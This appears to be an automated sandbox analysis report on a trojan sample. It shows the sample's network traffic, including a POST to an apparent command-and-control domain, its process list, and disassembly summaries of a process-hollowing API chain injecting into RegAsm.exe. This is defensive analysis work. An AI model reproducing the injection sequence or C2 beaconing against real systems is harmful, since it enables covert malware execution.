          Set-Cookie: PHPSESSID=83rdi2afngv8f9dhc7cddk15i1; expires=Sun, 22-Dec-2024 07:15:45 GMT; Max-Age=9999999; path=/
          Expires: Thu, 19 Nov 1981 08:52:00 GMT
          Cache-Control: no-store, no-cache, must-revalidate
          Pragma: no-cache
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Li8ZRNaqtKUAd9qJnzDzkR13zIEOx4OlJONFJzfOgMWxKTqqae5rDaPxB5yQ9U78%2FDWOFQwEiHUj7ZmfPimzO6s9AC4k6IYLg1G44nEmjTzIuiNlFh%2Bo7gJ3gWmk%2FDovxz%2F2RrM%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8ba4a5f37d7a41ac-EWR
          alt-svc: h3=":443"; ma=86400
          2024-08-28 13:29:06 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
          Data Ascii: aerror #D12
          2024-08-28 13:29:06 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          2192.168.2.749705188.114.97.3443320C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          TimestampBytes transferredDirectionData
          2024-08-28 13:29:06 UTC263OUTPOST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: application/x-www-form-urlencoded
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 8
          Host: traineiwnqo.shop
          2024-08-28 13:29:06 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
          Data Ascii: act=life
          2024-08-28 13:29:07 UTC543INHTTP/1.1 200 OK
          Date: Wed, 28 Aug 2024 13:29:07 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: close
          X-Frame-Options: SAMEORIGIN
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9AYW3u6A3O2EexhfaxO6u%2BCN3XCToRfG%2FMSYewtXYiP9opGlcRnkhwu2wOseLAJ1z8MK3WJb2wzkbCQn91ukvDnouPgZDGyRLp31LVCk164FWSZT55pJj9xXLFx8Qx3TuBrj"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8ba4a5fb1f078cc0-EWR
          2024-08-28 13:29:07 UTC826INData Raw: 31 31 32 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
          Data Ascii: 1128<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
          2024-08-28 13:29:07 UTC1369INData Raw: 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74
          Data Ascii: s.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert
          2024-08-28 13:29:07 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 5a 38 72 4f 4f 56 70 43 47 56 6d 67 57 4e 54 6d 44 5a 53 33 52 45 30 33 39 61 64 35 55 47 39 4f 45 6c 69 75 6a 49 76 59 44 4b 51 2d 31 37 32 34 38 35 31 37 34 37 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 64 64 6f 73 2f 67 6c 6f 73 73 61 72 79 2f 6d 61 6c 77 61 72 65 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75
          Data Ascii: <input type="hidden" name="atok" value="Z8rOOVpCGVmgWNTmDZS3RE039ad5UG9OEliujIvYDKQ-1724851747-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/ddos/glossary/malware/" class="cf-btn" style="backgrou
          2024-08-28 13:29:07 UTC836INData Raw: 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20
          Data Ascii: ll;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></span>
          2024-08-28 13:29:07 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Statistics

          CPU Usage

          Click to jump to process

          Memory Usage

          Click to jump to process

          High Level Behavior Distribution

          Click to dive into process behavior distribution

          Behavior

          Click to jump to process

          System Behavior

          General

          Target ID:0
          Start time:09:29:01
          Start date:28/08/2024
          Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe"
          Imagebase:0x4c0000
          File size:14'336 bytes
          MD5 hash:876C12019E3B15FE92841E8D358D4921
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:true

          General

          Target ID:2
          Start time:09:29:02
          Start date:28/08/2024
          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Wow64 process (32bit):false
          Commandline:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
          Imagebase:0xa0000
          File size:65'440 bytes
          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          General

          Target ID:3
          Start time:09:29:02
          Start date:28/08/2024
          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Wow64 process (32bit):true
          Commandline:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
          Imagebase:0xaf0000
          File size:65'440 bytes
          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Disassembly

          Reset < >

            Execution Graph

            Execution Coverage:28.2%
            Dynamic/Decrypted Code Coverage:100%
            Signature Coverage:11.1%
            Total number of Nodes:63
            Total number of Limit Nodes:2
            execution_graph 2011 cf0848 2014 cf0887 2011->2014 2015 cf08c5 2014->2015 2019 cf0908 2015->2019 2023 cf0901 2015->2023 2016 cf0857 2020 cf0931 2019->2020 2027 cf0981 2020->2027 2024 cf0931 2023->2024 2026 cf0981 12 API calls 2024->2026 2025 cf094b 2025->2025 2026->2025 2028 cf09b4 2027->2028 2029 cf094b 2027->2029 2032 cf0a61 2028->2032 2036 cf0a70 2028->2036 2033 cf0aad 2032->2033 2040 cf0aef 2033->2040 2037 cf0aad 2036->2037 2039 cf0aef 12 API calls 2037->2039 2038 cf0aca 2038->2029 2039->2038 2041 cf0b19 2040->2041 2045 cf0bf4 2041->2045 2049 cf0c00 2041->2049 2042 cf0b33 2046 cf0c25 2045->2046 2047 cf0c49 2046->2047 2053 cf31b4 2046->2053 2047->2042 2050 cf0c25 2049->2050 2051 cf0c49 2050->2051 2052 cf31b4 12 API calls 2050->2052 2051->2042 2052->2051 2055 cf31e7 2053->2055 2054 cf391b 2054->2047 2055->2054 2056 cf2a08 Wow64SetThreadContext 2055->2056 2057 cf2a10 Wow64SetThreadContext 2055->2057 2066 cf2ba8 WriteProcessMemory 2055->2066 2067 cf2ba0 WriteProcessMemory 2055->2067 2068 cf2e24 2055->2068 2072 cf2e30 2055->2072 2076 cf2c91 2055->2076 2080 cf2c98 2055->2080 2084 cf2ae8 2055->2084 2088 cf2ae0 2055->2088 2092 cf2958 2055->2092 2096 cf2960 2055->2096 2056->2055 2057->2055 2066->2055 2067->2055 2069 cf2eb9 CreateProcessA 2068->2069 2071 cf307b 2069->2071 2071->2071 2073 cf2eb9 CreateProcessA 2072->2073 2075 cf307b 2073->2075 2075->2075 2077 cf2ce3 ReadProcessMemory 2076->2077 2079 cf2d27 2077->2079 2079->2055 2081 cf2ce3 ReadProcessMemory 2080->2081 2083 cf2d27 2081->2083 2083->2055 2085 cf2b28 VirtualAllocEx 2084->2085 2087 cf2b65 2085->2087 2087->2055 2089 cf2b28 VirtualAllocEx 2088->2089 2091 cf2b65 2089->2091 2091->2055 2093 cf29a0 ResumeThread 2092->2093 2095 cf29d1 2093->2095 2095->2055 2097 cf29a0 ResumeThread 2096->2097 2099 cf29d1 2097->2099 2099->2055 2100 cf0847 2101 cf0857 2100->2101 2102 cf0887 12 API calls 2100->2102 2102->2101

            Executed Functions

            Function 00CF31B4 Relevance: 1.8, Strings: 1, Instructions: 536COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 0 cf31b4-cf31e5 1 cf31e7-cf31ed 0->1 2 cf32a4-cf32a7 1->2 3 cf31f3 1->3 2->1 11 cf32ad-cf32af 2->11 3->2 4 cf329f 3->4 5 cf326c-cf3271 3->5 6 cf31fa-cf321d 3->6 7 cf3298-cf329d 3->7 8 cf3247-cf326a 3->8 9 cf3273-cf3296 3->9 10 cf3222-cf3245 3->10 4->2 5->2 6->2 7->2 8->2 9->2 10->2 12 cf32b2-cf332c 11->12 146 cf332f call cf2e24 12->146 147 cf332f call cf2e30 12->147 24 cf3331-cf3333 25 cf3339-cf337f 24->25 26 cf38d1-cf38e4 24->26 31 cf38eb-cf3904 call cf2134 25->31 33 cf3385-cf339e 25->33 26->31 47 cf3909-cf3915 31->47 136 cf33a1 call cf2a08 33->136 137 cf33a1 call cf2a10 33->137 35 cf33a3-cf33a5 36 cf33ab-cf33b5 35->36 37 cf38b7-cf38ca 35->37 36->31 39 cf33bb-cf33e3 36->39 37->26 144 cf33e6 call cf2c98 39->144 145 cf33e6 call cf2c91 39->145 42 cf33e8-cf33ea 44 cf389d-cf38b0 42->44 45 cf33f0-cf33f3 42->45 44->37 48 cf33f5-cf340b 45->48 49 cf3411-cf344e 45->49 47->12 54 cf391b-cf3922 47->54 48->49 56 cf3883-cf3896 48->56 142 cf3451 call cf2ae8 49->142 143 cf3451 call cf2ae0 49->143 56->44 59 cf3453-cf3458 60 cf345e-cf3478 59->60 61 cf3869-cf387c 59->61 148 cf347b call cf2ba8 60->148 149 cf347b call cf2ba0 60->149 61->56 63 cf347d-cf347f 65 cf384f-cf3862 63->65 66 cf3485-cf34aa 63->66 65->61 70 cf3751-cf3776 66->70 71 cf34b0-cf3523 66->71 140 cf3779 call cf2ba8 70->140 141 cf3779 call cf2ba0 70->141 97 cf3525-cf3527 71->97 98 cf3531-cf35aa 71->98 76 cf377b-cf377d 77 cf381b-cf382e 76->77 78 cf3783-cf37a6 76->78 89 cf3835-cf3848 77->89 78->31 82 cf37ac-cf37c4 78->82 152 cf37c7 call cf2a08 82->152 153 cf37c7 call cf2a10 82->153 86 cf37c9-cf37cb 87 cf37cd-cf37d9 86->87 88 cf3801-cf3814 86->88 138 cf37dc call cf2958 87->138 139 cf37dc call cf2960 87->139 88->77 89->65 91 cf37de-cf37e1 91->54 95 cf37e7-cf37fa 91->95 95->88 97->98 109 cf35ac-cf35ae 98->109 110 cf35b8-cf3631 98->110 109->110 118 cf363f-cf3649 110->118 119 cf3633-cf3635 110->119 120 cf373f-cf374b 118->120 121 cf364f-cf3732 118->121 119->118 120->70 120->71 150 cf3735 call cf2ba8 121->150 151 cf3735 call cf2ba0 121->151 135 cf3737-cf3739 135->89 135->120 136->35 137->35 138->91 139->91 140->76 141->76 142->59 143->59 144->42 145->42 146->24 147->24 148->63 149->63 150->135 151->135 152->86 153->86
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1253008950.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_cf0000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID: <-q
            • API String ID: 0-3445421276
            • Opcode ID: 42848d297370ea74e60b5998f168583cac79f25391276d60f26c61fb1b5a655d
            • Instruction ID: 125c49f1b9b13fcfd9b59c5fff3c5e89a09150642ecb61bc0db0713899d23ead
            • Opcode Fuzzy Hash: 42848d297370ea74e60b5998f168583cac79f25391276d60f26c61fb1b5a655d
            • Instruction Fuzzy Hash: F9128130B002099FDB58DB65D855B6EB7B2BFC8300F24C169E80AAB395DF35DD428B95
            Function 00CF2E24 Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 154 cf2e24-cf2ec5 156 cf2efe-cf2f1e 154->156 157 cf2ec7-cf2ed1 154->157 162 cf2f57-cf2f86 156->162 163 cf2f20-cf2f2a 156->163 157->156 158 cf2ed3-cf2ed5 157->158 160 cf2ef8-cf2efb 158->160 161 cf2ed7-cf2ee1 158->161 160->156 164 cf2ee5-cf2ef4 161->164 165 cf2ee3 161->165 173 cf2fbf-cf3079 CreateProcessA 162->173 174 cf2f88-cf2f92 162->174 163->162 166 cf2f2c-cf2f2e 163->166 164->164 167 cf2ef6 164->167 165->164 168 cf2f51-cf2f54 166->168 169 cf2f30-cf2f3a 166->169 167->160 168->162 171 cf2f3e-cf2f4d 169->171 172 cf2f3c 169->172 171->171 175 cf2f4f 171->175 172->171 185 cf307b-cf3081 173->185 186 cf3082-cf3108 173->186 174->173 176 cf2f94-cf2f96 174->176 175->168 177 cf2fb9-cf2fbc 176->177 178 cf2f98-cf2fa2 176->178 177->173 180 cf2fa6-cf2fb5 178->180 181 cf2fa4 178->181 180->180 182 cf2fb7 180->182 181->180 182->177 185->186 196 cf310a-cf310e 186->196 197 cf3118-cf311c 186->197 196->197 198 cf3110-cf3113 call cf106c 196->198 199 cf311e-cf3122 197->199 200 cf312c-cf3130 197->200 198->197 199->200 202 cf3124-cf3127 call cf106c 199->202 203 cf3132-cf3136 200->203 204 cf3140-cf3144 200->204 202->200 203->204 206 cf3138-cf313b call cf106c 203->206 207 cf3156-cf315d 204->207 208 cf3146-cf314c 204->208 206->204 209 cf315f-cf316e 207->209 210 cf3174 207->210 208->207 209->210 213 cf3175 210->213 213->213
            APIs
            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00CF3066
            Memory Dump Source
            • Source File: 00000000.00000002.1253008950.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_cf0000_SecuriteInfo.jbxd
            Similarity
            • API ID: CreateProcess
            • String ID:
            • API String ID: 963392458-0
            • Opcode ID: e1e492a77f97b54ed410dc0b707525e9d9ff7703bbb3ff0a3eb76be711dad655
            • Instruction ID: 611615fa972ddcc322127ec0c842a57dca68b7f2567c61fce8efe8d2a813a789
            • Opcode Fuzzy Hash: e1e492a77f97b54ed410dc0b707525e9d9ff7703bbb3ff0a3eb76be711dad655
            • Instruction Fuzzy Hash: B5A16C71D0075D9FEB64CFA8C841BEDBBB2BF48310F148169E919A7240DB749A85CF92
            Function 00CF2E30 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 214 cf2e30-cf2ec5 216 cf2efe-cf2f1e 214->216 217 cf2ec7-cf2ed1 214->217 222 cf2f57-cf2f86 216->222 223 cf2f20-cf2f2a 216->223 217->216 218 cf2ed3-cf2ed5 217->218 220 cf2ef8-cf2efb 218->220 221 cf2ed7-cf2ee1 218->221 220->216 224 cf2ee5-cf2ef4 221->224 225 cf2ee3 221->225 233 cf2fbf-cf3079 CreateProcessA 222->233 234 cf2f88-cf2f92 222->234 223->222 226 cf2f2c-cf2f2e 223->226 224->224 227 cf2ef6 224->227 225->224 228 cf2f51-cf2f54 226->228 229 cf2f30-cf2f3a 226->229 227->220 228->222 231 cf2f3e-cf2f4d 229->231 232 cf2f3c 229->232 231->231 235 cf2f4f 231->235 232->231 245 cf307b-cf3081 233->245 246 cf3082-cf3108 233->246 234->233 236 cf2f94-cf2f96 234->236 235->228 237 cf2fb9-cf2fbc 236->237 238 cf2f98-cf2fa2 236->238 237->233 240 cf2fa6-cf2fb5 238->240 241 cf2fa4 238->241 240->240 242 cf2fb7 240->242 241->240 242->237 245->246 256 cf310a-cf310e 246->256 257 cf3118-cf311c 246->257 256->257 258 cf3110-cf3113 call cf106c 256->258 259 cf311e-cf3122 257->259 260 cf312c-cf3130 257->260 258->257 259->260 262 cf3124-cf3127 call cf106c 259->262 263 cf3132-cf3136 260->263 264 cf3140-cf3144 260->264 262->260 263->264 266 cf3138-cf313b call cf106c 263->266 267 cf3156-cf315d 264->267 268 cf3146-cf314c 264->268 266->264 269 cf315f-cf316e 267->269 270 cf3174 267->270 268->267 269->270 273 cf3175 270->273 273->273
            APIs
            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00CF3066
            Memory Dump Source
            • Source File: 00000000.00000002.1253008950.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_cf0000_SecuriteInfo.jbxd
            Similarity
            • API ID: CreateProcess
            • String ID:
            • API String ID: 963392458-0
            • Opcode ID: 308bd8ca46db054f66905e9c95e8f78fa54a79f0271e375eeb0f2887be4c4485
            • Instruction ID: b532012a94094a0d1064592630fcd4daadd40f821fedc142ffec915425f4ed4d
            • Opcode Fuzzy Hash: 308bd8ca46db054f66905e9c95e8f78fa54a79f0271e375eeb0f2887be4c4485
            • Instruction Fuzzy Hash: 33915B71D0075D9FEB64CFA8C841BEDBBB2BF48310F148169E919A7240DB749A85CF92
            Function 00CF2BA0 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 274 cf2ba0-cf2bf6 276 cf2bf8-cf2c04 274->276 277 cf2c06-cf2c45 WriteProcessMemory 274->277 276->277 279 cf2c4e-cf2c7e 277->279 280 cf2c47-cf2c4d 277->280 280->279
            APIs
            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00CF2C38
            Memory Dump Source
            • Source File: 00000000.00000002.1253008950.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_cf0000_SecuriteInfo.jbxd
            Similarity
            • API ID: MemoryProcessWrite
            • String ID:
            • API String ID: 3559483778-0
            • Opcode ID: 85f6fe4dbc21bee1875e60d2471b7499824c29feea936cf8fb9c1f4455e26350
            • Instruction ID: 6a2c8d2f51aca8b89ee68be148352f14a7f35d07249572b982573960aa20a51e
            • Opcode Fuzzy Hash: 85f6fe4dbc21bee1875e60d2471b7499824c29feea936cf8fb9c1f4455e26350
            • Instruction Fuzzy Hash: 8F2133B5D003499FDB10DFA9C881BEEBBF1FF48310F50842AE969A7251C7799945CBA0
            Function 00CF2BA8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 284 cf2ba8-cf2bf6 286 cf2bf8-cf2c04 284->286 287 cf2c06-cf2c45 WriteProcessMemory 284->287 286->287 289 cf2c4e-cf2c7e 287->289 290 cf2c47-cf2c4d 287->290 290->289
            APIs
            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00CF2C38
            Memory Dump Source
            • Source File: 00000000.00000002.1253008950.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_cf0000_SecuriteInfo.jbxd
            Similarity
            • API ID: MemoryProcessWrite
            • String ID:
            • API String ID: 3559483778-0
            • Opcode ID: 6670afd08240d5ccd8ea4e749065463f1283d16d60e91ca0d28f7c0571ff0727
            • Instruction ID: 6a6bff5f1582a3eedb3483d6426dc05c0ef6e782430a1ae394ef8c8267e27e74
            • Opcode Fuzzy Hash: 6670afd08240d5ccd8ea4e749065463f1283d16d60e91ca0d28f7c0571ff0727
            • Instruction Fuzzy Hash: 7B2135B1D003099FDB10CFA9C881BEEBBF5FB48310F508429E918A7240C7789941CBA0
            Function 00CF2A08 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 294 cf2a08-cf2a5b 296 cf2a5d-cf2a69 294->296 297 cf2a6b-cf2a9b Wow64SetThreadContext 294->297 296->297 299 cf2a9d-cf2aa3 297->299 300 cf2aa4-cf2ad4 297->300 299->300
            APIs
            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00CF2A8E
            Memory Dump Source
            • Source File: 00000000.00000002.1253008950.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_cf0000_SecuriteInfo.jbxd
            Similarity
            • API ID: ContextThreadWow64
            • String ID:
            • API String ID: 983334009-0
            • Opcode ID: 5aae4ad406a02e940443322b196be2f67fafc6720f16089b69e179772314cf9d
            • Instruction ID: 089beae5fcf7a5f77debd254763b97daf38ccbfd4681ef68f8894ff9c6ab1ad9
            • Opcode Fuzzy Hash: 5aae4ad406a02e940443322b196be2f67fafc6720f16089b69e179772314cf9d
            • Instruction Fuzzy Hash: 8C215971D003098FDB24CFAAC485BEEBBF4AF48310F54842DD959A7241CB789945CFA1
            Function 00CF2C91 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 304 cf2c91-cf2d25 ReadProcessMemory 307 cf2d2e-cf2d5e 304->307 308 cf2d27-cf2d2d 304->308 308->307
            APIs
            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00CF2D18
            Memory Dump Source
            • Source File: 00000000.00000002.1253008950.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_cf0000_SecuriteInfo.jbxd
            Similarity
            • API ID: MemoryProcessRead
            • String ID:
            • API String ID: 1726664587-0
            • Opcode ID: a01e2443e90e553754a70a367c87ba8d8d698f02f9df213557389c2d8493c947
            • Instruction ID: c5e8037ad48433cb6d9c0b6bebdeb35ae3a853c5cd79a49a74b350e749df364e
            • Opcode Fuzzy Hash: a01e2443e90e553754a70a367c87ba8d8d698f02f9df213557389c2d8493c947
            • Instruction Fuzzy Hash: 7721F375C002499FDB10DFAAC881BEEBBB5FF48320F50842EE959A7250C7799905CBA1
            Function 00CF2C98 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 322 cf2c98-cf2d25 ReadProcessMemory 325 cf2d2e-cf2d5e 322->325 326 cf2d27-cf2d2d 322->326 326->325
            APIs
            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00CF2D18
            Memory Dump Source
            • Source File: 00000000.00000002.1253008950.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_cf0000_SecuriteInfo.jbxd
            Similarity
            • API ID: MemoryProcessRead
            • String ID:
            • API String ID: 1726664587-0
            • Opcode ID: 7f4bfebe6692b70da97b64368a9377db8963637a8afc27e0481b59a62922453e
            • Instruction ID: d48028ab7c719e2e1b913f5d6e326822ae3915ea2e99c12f15339a21ff5c6bdb
            • Opcode Fuzzy Hash: 7f4bfebe6692b70da97b64368a9377db8963637a8afc27e0481b59a62922453e
            • Instruction Fuzzy Hash: 85211671C003499FDB10DFAAC881BEEBBF5FF48310F50842AE919A7240C7799901CBA5
            Function 00CF2A10 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 312 cf2a10-cf2a5b 314 cf2a5d-cf2a69 312->314 315 cf2a6b-cf2a9b Wow64SetThreadContext 312->315 314->315 317 cf2a9d-cf2aa3 315->317 318 cf2aa4-cf2ad4 315->318 317->318
            APIs
            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00CF2A8E
            Memory Dump Source
            • Source File: 00000000.00000002.1253008950.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_cf0000_SecuriteInfo.jbxd
            Similarity
            • API ID: ContextThreadWow64
            • String ID:
            • API String ID: 983334009-0
            • Opcode ID: 1d0dc05595888a92eb81c85a4583329304e6050d61ad13f3b2960b8200bebad4
            • Instruction ID: 5dd0ffd85a56cc481c79785170ad09e1ab333b0cef02890dee345e68afd4f711
            • Opcode Fuzzy Hash: 1d0dc05595888a92eb81c85a4583329304e6050d61ad13f3b2960b8200bebad4
            • Instruction Fuzzy Hash: 05212971D003098FDB24DFAAC485BEEBBF4EF48324F548429D559A7240CB789945CFA5
            Function 00CF2AE0 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
